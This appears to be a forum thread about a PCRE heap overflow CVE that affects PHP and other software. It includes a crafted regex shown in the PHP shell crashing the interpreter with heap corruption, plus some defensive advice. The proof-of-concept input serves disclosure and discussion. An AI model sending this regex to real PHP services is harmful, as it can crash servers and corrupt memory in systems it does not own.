PCRE Heap Overflow in Regex Processing Lets Users Execute Arbitrary Code
securitytracker.com
securitytracker.com
http://php.net/manual/en/intro.pcre.php
Edit: Here's a copy of the actual CVE, which demonstrates the vulnerability using PHP: http://www.openwall.com/lists/oss-security/2015/06/01/6
The CVE mentions that PCRE is used in Flash, Apache, and Nginx.
Edit2: Could a mod change the article url to the openwall CVE? It seems that securitytracker.com is not the most responsive website. Sorry, I should have linked to the CVE directly.
Jebus... Just burn it all down, we're screwed.
repoquery --whatrequires pcre --installed
repoquery --whatrequires pcre
If that's the case, a typical nginx/apache config shouldn't be remotely vulnerable, right? Though I could see some shared hosting scenarios having some issues.
Even without this vulnerability, some regexes can be painfully slow.
/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/
is that `WGXCREDITS` the command to execute?The string is likely only important due to its length. Using an alternate 10 character string triggers the same error:
~ $ php -a
Interactive shell
php > preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/","ADLAB",$arr);
*** Error in `php': free(): invalid next size (normal): 0x0000000002ff7a10 ***
Aborted
~ $ php -a
Interactive shell
php > preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>AAAAAAAAAA)/","ADLAB",$arr);
*** Error in `php': free(): invalid next size (normal): 0x00000000020e5a10 ***
AbortedUntil PCRE or PHP release a patch for this, you remain vulnerable. You'd want to defend against this at the web server level -- think `MOD_SECURITY` rules that scan requests, look for known "bad" regular expressions, and then stop that request from reaching the PHP application. If you have a good hosting company hopefully they're already doing this for you.